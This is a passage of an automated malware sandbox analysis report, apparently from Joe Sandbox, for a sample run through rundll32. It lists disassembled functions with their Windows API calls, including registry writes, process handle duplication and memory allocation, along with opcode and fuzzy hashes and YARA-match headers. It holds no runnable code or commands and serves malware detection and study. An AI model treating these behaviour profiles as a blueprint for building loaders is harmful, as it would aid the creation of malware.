                              • RtlEnterCriticalSection.NTDLL(0595A428), ref: 0593612D
                              • RtlLeaveCriticalSection.NTDLL(0595A428), ref: 05936185
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                              • String ID:
                              • API String ID: 3746371830-0
                              • Opcode ID: 06e95f80d8136f3fcbf6ff002072650c3eb6dfc300eda2554baad3e557107a1c
                              • Instruction ID: 86c04e0e0aeafc280818800c4d3b406920ddc8dd86f9a2144242b89df6e69b70
                              • Opcode Fuzzy Hash: 06e95f80d8136f3fcbf6ff002072650c3eb6dfc300eda2554baad3e557107a1c
                              • Instruction Fuzzy Hash: BA416971514705EFCB228FA4D94AB6ABFFAFF48311F108519F80A97211DB70A964CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594FBF1 Relevance: 13.6, APIs: 9, Instructions: 105memorystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 05945119: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0594514B
                                • Part of subcall function 05945119: HeapFree.KERNEL32(00000000,00000000,?,?,0594FC0D,?,00000022,00000000,00000000,00000000,?,?), ref: 05945170
                                • Part of subcall function 059479A0: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0594FC2E,?,?,?,?,?,00000022,00000000,00000000), ref: 059479DC
                                • Part of subcall function 059479A0: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,0594FC2E,?,?,?,?,?,00000022,00000000,00000000,00000000,?), ref: 05947A2F
                              • lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 0594FC63
                              • lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 0594FC6B
                              • lstrlen.KERNEL32(?), ref: 0594FC75
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0594FC8A
                              • wsprintfA.USER32 ref: 0594FCC6
                              • HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 0594FCE5
                              • HeapFree.KERNEL32(00000000,?), ref: 0594FCFA
                              • HeapFree.KERNEL32(00000000,?), ref: 0594FD07
                              • HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 0594FD15
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Free$lstrlen$Allocate$wsprintf
                              • String ID:
                              • API String ID: 168057987-0
                              • Opcode ID: 209e9dab163c8dec856b1a7523de41877556dca531095991eb45c6d5df9c9208
                              • Instruction ID: a2865fa18201f31137d97bf00ffe0ec462b529f540090b242ee19fdb86f15481
                              • Opcode Fuzzy Hash: 209e9dab163c8dec856b1a7523de41877556dca531095991eb45c6d5df9c9208
                              • Instruction Fuzzy Hash: CC317E31618315AFC711AFB4DC45E6BBFA9FF88710F01092AB944D6251DB709C289B96
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593F39B Relevance: 13.6, APIs: 9, Instructions: 89filesynchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0593F3DB
                              • GetLastError.KERNEL32 ref: 0593F3E5
                              • WaitForSingleObject.KERNEL32(000000C8), ref: 0593F40A
                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0593F42D
                              • SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0593F455
                              • WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0593F46A
                              • SetEndOfFile.KERNEL32(00001000), ref: 0593F477
                              • GetLastError.KERNEL32 ref: 0593F483
                              • CloseHandle.KERNEL32(00001000), ref: 0593F48F
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                              • String ID:
                              • API String ID: 2864405449-0
                              • Opcode ID: 78fb0f95434b619f97aa9aa688b0ee746cd03c235d51eda653fd9775e8210c8a
                              • Instruction ID: cea809375cd0c72cbc311de36bbeadbc900926fd973e80455ae0c091362ac5e0
                              • Opcode Fuzzy Hash: 78fb0f95434b619f97aa9aa688b0ee746cd03c235d51eda653fd9775e8210c8a
                              • Instruction Fuzzy Hash: E7316971904208FFEB109FA9DC4EBAEBFB9FF04325F208150F915A61E1C7749A648B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0595068D Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,05935674,00000008,?,00000010,00000001,00000000,0000003A), ref: 059506AC
                              • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 059506E0
                              • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 059506E8
                              • GetLastError.KERNEL32 ref: 059506F2
                              • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 0595070E
                              • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 05950727
                              • CancelIo.KERNEL32(?), ref: 0595073C
                              • CloseHandle.KERNEL32(?), ref: 0595074C
                              • GetLastError.KERNEL32 ref: 05950754
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                              • String ID:
                              • API String ID: 4263211335-0
                              • Opcode ID: ca041f5f5494f0874a2137926dd5df52dab7e2a6aa39b81057a194723ea825de
                              • Instruction ID: 196a9c4a5d445f3a8a02353398f1e765e28e7a93fd213cfc8e38ccab038c1b88
                              • Opcode Fuzzy Hash: ca041f5f5494f0874a2137926dd5df52dab7e2a6aa39b81057a194723ea825de
                              • Instruction Fuzzy Hash: DD212B75915218BFCB019FA5DC8D9EEBF7AFB44321B058412F90AD6141DB308A64CFA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05941C19 Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0593E231,00000000,76CDF5B0,05940348,?,00000001), ref: 05941C25
                              • _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 05941C3B
                              • _snwprintf.NTDLL ref: 05941C60
                              • CreateFileMappingW.KERNEL32(000000FF,0595A1E8,00000004,00000000,00001000,?), ref: 05941C7C
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 05941C8E
                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 05941CA5
                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 05941CC6
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 05941CCE
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                              • String ID:
                              • API String ID: 1814172918-0
                              • Opcode ID: 403806a26e4cde554ec52381d88b14dab9951542c650deba68234f0e76cff70a
                              • Instruction ID: 79ac1753692f42509dd3948fb674740b6907795c6e0d71c538ff9b7e5fccf7ed
                              • Opcode Fuzzy Hash: 403806a26e4cde554ec52381d88b14dab9951542c650deba68234f0e76cff70a
                              • Instruction Fuzzy Hash: BB2102B2604304BBC721EF64DC06F9E7BB9AB84761F214021FA0AE7280EB709955DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594CB5A Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 191stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(00000000,?,05F39A2B,?,?,05F39A2B,?,?,05F39A2B,?,?,05F39A2B,?,00000000,00000000,00000000), ref: 0594CC58
                              • lstrcpyW.KERNEL32(00000000,?), ref: 0594CC7B
                              • lstrcatW.KERNEL32(00000000,00000000), ref: 0594CC83
                              • lstrlenW.KERNEL32(00000000,?,05F39A2B,?,?,05F39A2B,?,?,05F39A2B,?,?,05F39A2B,?,?,05F39A2B,?), ref: 0594CCCE
                              • memcpy.NTDLL(00000000,?,?,?), ref: 0594CD36
                              • LocalFree.KERNEL32(?,?), ref: 0594CD4F
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
                              • String ID: P
                              • API String ID: 3649579052-3110715001
                              • Opcode ID: 1a8323d23b08238d15e957c544e3e7a206fd602fb08d2b51828d2d35acaf38aa
                              • Instruction ID: 1c277a78914a8be82b92b1973c011fd9b2c52f50a9a64e290adfa699ffbc67d8
                              • Opcode Fuzzy Hash: 1a8323d23b08238d15e957c544e3e7a206fd602fb08d2b51828d2d35acaf38aa
                              • Instruction Fuzzy Hash: CD615971A0520AAFDF11EFA8CC8ADAEBBBDFF85204B054425F505A7210DB34AE15CF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594C563 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 148timestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0595148E: InterlockedIncrement.KERNEL32(00000018), ref: 059514DF
                                • Part of subcall function 0595148E: RtlLeaveCriticalSection.NTDLL(05F3C378), ref: 0595156A
                              • OpenProcess.KERNEL32(00000410,B8F475FF,05942289,00000000,00000000,05942289,0000001C,00000000,00000000,?,?,?,05942289), ref: 0594C5BD
                              • CloseHandle.KERNEL32(00000000,00000000,00000000,05942299,00000104,?,?,?,05942289), ref: 0594C5DB
                              • GetSystemTimeAsFileTime.KERNEL32(05942289), ref: 0594C643
                              • lstrlenW.KERNEL32(C78BC933), ref: 0594C6B8
                              • GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 0594C6D4
                              • memcpy.NTDLL(00000014,C78BC933,00000002), ref: 0594C6EC
                                • Part of subcall function 0593F307: RtlLeaveCriticalSection.NTDLL(?), ref: 0593F384
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
                              • String ID: o
                              • API String ID: 2541713525-252678980
                              • Opcode ID: d1e1adc13fae15c0e1940f109fb82051f70c34e5852da463bf6fc2ff1f7d7c6d
                              • Instruction ID: 2f8b90ab17d6d01d3b0049c395263d4567f6294b1de1019c188a0f191fcbc6fe
                              • Opcode Fuzzy Hash: d1e1adc13fae15c0e1940f109fb82051f70c34e5852da463bf6fc2ff1f7d7c6d
                              • Instruction Fuzzy Hash: 0C516B71615706EFDB21DF64D889FAABBA8FF08704F144529E90AD7240EB70ED908F94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593A316 Relevance: 12.2, APIs: 8, Instructions: 209timeCOMMON
                              Download Yara Rule
                              APIs
                              • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 0593A391
                              • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0593A3BD
                              • _allmul.NTDLL(?,?,FFFFD8F0,000000FF), ref: 0593A3CD
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,FFFFD8F0,000000FF), ref: 0593A405
                              • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,FFFFD8F0,000000FF), ref: 0593A427
                              • GetShellWindow.USER32 ref: 0593A436
                                • Part of subcall function 05942986: GetShellWindow.USER32 ref: 059429A4
                                • Part of subcall function 05942986: GetVersion.KERNEL32 ref: 05942A46
                                • Part of subcall function 05942986: GetVersion.KERNEL32 ref: 05942A54
                              • GetLastError.KERNEL32(?), ref: 0593A521
                              • CloseHandle.KERNEL32(?), ref: 0593A535
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: TimerWaitable$ShellVersionWindow$CloseCreateErrorHandleLastMultipleObjectsWait_allmul
                              • String ID:
                              • API String ID: 2436285880-0
                              • Opcode ID: f6e8943524cd7c108bbb30f05559a1181551f8e7d90e3b021d9bbb26f6fc99e9
                              • Instruction ID: f1d7bf4a82c803f2e0c723740728af32355ebf3bd0d1dcc82af1ff81cce1f7e0
                              • Opcode Fuzzy Hash: f6e8943524cd7c108bbb30f05559a1181551f8e7d90e3b021d9bbb26f6fc99e9
                              • Instruction Fuzzy Hash: BB7124B1508345EFDB10EFA4C88996FBBEDFB88254F004A2EF595D7290D730D9458BA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05937A61 Relevance: 12.1, APIs: 8, Instructions: 123memoryregistrysynchronizationCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0594B7A4: RegCreateKeyA.ADVAPI32(80000001,05F3B7F0,?), ref: 0594B7B9
                                • Part of subcall function 0594B7A4: lstrlen.KERNEL32(05F3B7F0,00000000,00000000,00000000,?,0594A2EB,00000001,?,00000000,00000000,00000000,?,0593109E,05959F2C,00000008,00000003), ref: 0594B7E2
                              • RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 05937AA6
                              • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 05937ABE
                              • HeapFree.KERNEL32(00000000,?,?,059487CC,?,?), ref: 05937B20
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 05937B34
                              • WaitForSingleObject.KERNEL32(00000000,?,059487CC,?,?), ref: 05937B86
                              • HeapFree.KERNEL32(00000000,?,?,059487CC,?,?), ref: 05937BAF
                              • HeapFree.KERNEL32(00000000,?,?,059487CC,?,?), ref: 05937BBF
                              • RegCloseKey.ADVAPI32(?,?,059487CC,?,?), ref: 05937BC8
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
                              • String ID:
                              • API String ID: 3503961013-0
                              • Opcode ID: 68de8cc78209596b917b6d935b9293fb6798e27e8548352db670b0c5a5d42ad5
                              • Instruction ID: a70f3e7adbc368ffc72b1d52d5f453ba3ab88b7fd6ced14e1874fee890d12daf
                              • Opcode Fuzzy Hash: 68de8cc78209596b917b6d935b9293fb6798e27e8548352db670b0c5a5d42ad5
                              • Instruction Fuzzy Hash: E64190B5D14219EFDF019FE4C8868EEBFBEFF08215F10846AE515A2211D7354AA8DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593AAAF Relevance: 12.1, APIs: 8, Instructions: 112stringtimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,0593A1A1), ref: 0593AAC5
                              • wsprintfA.USER32 ref: 0593AAED
                              • lstrlen.KERNEL32(?), ref: 0593AAFC
                                • Part of subcall function 0594E803: RtlFreeHeap.NTDLL(00000000,?,05943953,?,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 0594E80F
                              • wsprintfA.USER32 ref: 0593AB3C
                              • wsprintfA.USER32 ref: 0593AB71
                              • memcpy.NTDLL(00000000,?,?), ref: 0593AB7E
                              • memcpy.NTDLL(00000008,059553E8,00000002,00000000,?,?), ref: 0593AB93
                              • wsprintfA.USER32 ref: 0593ABB6
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                              • String ID:
                              • API String ID: 2937943280-0
                              • Opcode ID: 7e7bc835be2c3ac1ff1d241419d0541bdf399ce70360909c90cd42671b60a111
                              • Instruction ID: b6987eade3c3c55a601752f185c3d95d4adf4e62513d10c438b618945400030e
                              • Opcode Fuzzy Hash: 7e7bc835be2c3ac1ff1d241419d0541bdf399ce70360909c90cd42671b60a111
                              • Instruction Fuzzy Hash: 67415DB1A0020AEFDB10DFA8D885EAEB7FDEF44318B154555F949D7211EB30EA11CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059463D1 Relevance: 12.1, APIs: 8, Instructions: 72memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,0593A7C4,?,?,?,?), ref: 059463F5
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05946407
                              • wcstombs.NTDLL ref: 05946415
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,0593A7C4,?,?,?), ref: 05946439
                              • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0594644E
                              • mbstowcs.NTDLL ref: 0594645B
                              • HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,0593A7C4,?,?,?,?,?), ref: 0594646D
                              • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,0593A7C4,?,?,?,?,?), ref: 05946487
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                              • String ID:
                              • API String ID: 316328430-0
                              • Opcode ID: 4bb24f8bbc09a8980287e0a14c3c223ff03205f99285acced636a50b892bfa11
                              • Instruction ID: 86cb73bb1ded559518c62bef92c09109cf27b7f6d78501440bf17b93fcc93eca
                              • Opcode Fuzzy Hash: 4bb24f8bbc09a8980287e0a14c3c223ff03205f99285acced636a50b892bfa11
                              • Instruction Fuzzy Hash: 31214C7151430AFFDF119FA4EC09E9ABFB9FB45311F104125FA05A2061DB719A64DF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593D922 Relevance: 12.1, APIs: 8, Instructions: 57registrymemorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(0594E453,00000000,00000000,0595A440,?,?,0593F68B,0594E453,00000000,0594E453,0595A420), ref: 0593D935
                              • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0593D943
                              • wsprintfA.USER32 ref: 0593D95F
                              • RegCreateKeyA.ADVAPI32(80000001,0595A420,00000000), ref: 0593D977
                              • lstrlen.KERNEL32(?), ref: 0593D986
                              • RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001), ref: 0593D994
                              • RegCloseKey.ADVAPI32(?), ref: 0593D99F
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0593D9AE
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heaplstrlen$AllocateCloseCreateFreeValuewsprintf
                              • String ID:
                              • API String ID: 1575615994-0
                              • Opcode ID: e08c822e96cbae2c0b35ada5b27c5813ef1493c7b8633f2e1675d0e34106c559
                              • Instruction ID: b373637e72dc8ee67c1d19649ff699d11bc0bb2a44e243f5a16ae37e71d731d1
                              • Opcode Fuzzy Hash: e08c822e96cbae2c0b35ada5b27c5813ef1493c7b8633f2e1675d0e34106c559
                              • Instruction Fuzzy Hash: F3115B32124209FFEB015BA4EC4AEAABF7DEB49755F104021FA0596160EF729D24DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594FE06 Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON
                              Download Yara Rule
                              APIs
                              • OpenProcess.KERNEL32(00000040,00000000,?), ref: 0594FE12
                              • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 0594FE30
                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0594FE38
                              • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 0594FE56
                              • GetLastError.KERNEL32 ref: 0594FE6A
                              • RegCloseKey.ADVAPI32(?), ref: 0594FE75
                              • CloseHandle.KERNEL32(00000000), ref: 0594FE7C
                              • GetLastError.KERNEL32 ref: 0594FE84
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                              • String ID:
                              • API String ID: 3822162776-0
                              • Opcode ID: a0b0bb5b7cbe048b7d865ef43c19e9e8ae159209edd03ad18b59a5324a540853
                              • Instruction ID: 0851779e174b00fb18a5a6649cb59e9d4515bb1798f6381ac4ed57af4c38c295
                              • Opcode Fuzzy Hash: a0b0bb5b7cbe048b7d865ef43c19e9e8ae159209edd03ad18b59a5324a540853
                              • Instruction Fuzzy Hash: 34110C7611830AEFEB015FA5E849EAA7F6DFB44352F108010FA0A86252DF71CD64CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593941B Relevance: 11.5, APIs: 9, Instructions: 298COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 66db996fe3d30039eec0be54ad05e4d6a77be33ba9dfae6ae83b75637d361b50
                              • Instruction ID: 982adc8c831b530b1c6ca70b46d80e69454dcddc1a6519d4f159f8d35c0378d9
                              • Opcode Fuzzy Hash: 66db996fe3d30039eec0be54ad05e4d6a77be33ba9dfae6ae83b75637d361b50
                              • Instruction Fuzzy Hash: 2EB10071D01219EFDF21DFA4C94ABAEBBB9FF05318F044065E801B7260D7B5AA94CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059523FD Relevance: 11.5, APIs: 9, Instructions: 296COMMON
                              Download Yara Rule
                              APIs
                              • memcpy.NTDLL(?,?,0000000D,?,?,00000000,?,?,?,?,?,?,?,?,05952801,?), ref: 0595242E
                              • memcpy.NTDLL(?,?,0000000D,?,?,0000000D,?,?,00000000), ref: 0595243B
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • memcpy.NTDLL(00000000,?,?,00000008,?,00000001,05952801,00000000,00000001,?,?,?,?,05952801,?,00000000), ref: 059525C9
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: memcpy$AllocateHeap
                              • String ID:
                              • API String ID: 4068229299-0
                              • Opcode ID: 301c4b814cf5b71d3ef814d382b5c30ff439b0aa9b52c629491c9bfe05105596
                              • Instruction ID: 2c1a76e9a8901613393966b8da05b91ed4891fd5092959741ac0966b559808d6
                              • Opcode Fuzzy Hash: 301c4b814cf5b71d3ef814d382b5c30ff439b0aa9b52c629491c9bfe05105596
                              • Instruction Fuzzy Hash: CEB12D7960020AABDF11DFA4DD84EEE7BADBF44620F044125FD159B151EB30EA25CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593BA6B Relevance: 10.7, APIs: 7, Instructions: 165stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetCommandLineA.KERNEL32(059560F0,00000038,0593E22A,00000000,76CDF5B0,05940348,?,00000001,?,?,?,?,?,?,?,05939100), ref: 0593BA7C
                              • StrChrA.SHLWAPI(00000000,00000020,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 0593BA8D
                                • Part of subcall function 0593D4DA: lstrlen.KERNEL32(?,00000000,76C86980,00000000,0593DA7B,?), ref: 0593D4E3
                                • Part of subcall function 0593D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 0593D506
                                • Part of subcall function 0593D4DA: memset.NTDLL ref: 0593D515
                              • ExitProcess.KERNEL32 ref: 0593BC6F
                                • Part of subcall function 0593A8E9: StrChrA.SHLWAPI(00000020,?,765BD3B0,05F3C304,00000000,?,05936584,?), ref: 0593A90E
                                • Part of subcall function 0593A8E9: StrTrimA.SHLWAPI(00000020,05955FCC,00000000,?,05936584,?), ref: 0593A92D
                                • Part of subcall function 0593A8E9: StrChrA.SHLWAPI(00000020,?,?,05936584,?), ref: 0593A939
                              • lstrcmp.KERNEL32(?,?), ref: 0593BAFB
                              • VirtualAlloc.KERNEL32(00000000,0000FFFF,00001000,00000040,?,?,?,?,?,?,?,05939100,?), ref: 0593BB13
                                • Part of subcall function 05934BC4: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,05F3B7F0,?,?,0594B7F2,0000003A,05F3B7F0,?,0594A2EB,00000001,?,00000000,00000000), ref: 05934C04
                                • Part of subcall function 05934BC4: CloseHandle.KERNEL32(000000FF,?,?,0594B7F2,0000003A,05F3B7F0,?,0594A2EB,00000001,?,00000000,00000000,00000000,?,0593109E,05959F2C), ref: 05934C0F
                              • VirtualFree.KERNEL32(?,00000000,00008000,0000004B,00000000,00000000,-00000020,?,?,?,?,?,?,?,05939100,?), ref: 0593BB85
                              • lstrcmp.KERNEL32(?,?), ref: 0593BB9E
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtuallstrcmp$AllocCloseCommandErrorExitFreeHandleLastLineProcessTrimlstrlenmemcpymemset
                              • String ID:
                              • API String ID: 739714153-0
                              • Opcode ID: ca3f48ac8ef4723057b9ff3c563f7b01fe0b740db4b679a013858cc15752f5ad
                              • Instruction ID: fed38fe569a9b59a883bc02ae398c6a936973d44582b21c688cc1c51a95cbc83
                              • Opcode Fuzzy Hash: ca3f48ac8ef4723057b9ff3c563f7b01fe0b740db4b679a013858cc15752f5ad
                              • Instruction Fuzzy Hash: A6512971A10219EFDF20EBA4CC8AEEEBBBAFF48710F144425F105E6164DB35A951CB64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594948C Relevance: 10.6, APIs: 7, Instructions: 138memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 059494B7
                              • StrTrimA.SHLWAPI(00000000,?), ref: 059494D4
                              • HeapFree.KERNEL32(00000000,00000000), ref: 05949507
                              • RtlImageNtHeader.NTDLL(00000000), ref: 05949532
                              • HeapFree.KERNEL32(00000000,00000000,00000007,00000001,00000000,00000000), ref: 059495F7
                                • Part of subcall function 0593D4DA: lstrlen.KERNEL32(?,00000000,76C86980,00000000,0593DA7B,?), ref: 0593D4E3
                                • Part of subcall function 0593D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 0593D506
                                • Part of subcall function 0593D4DA: memset.NTDLL ref: 0593D515
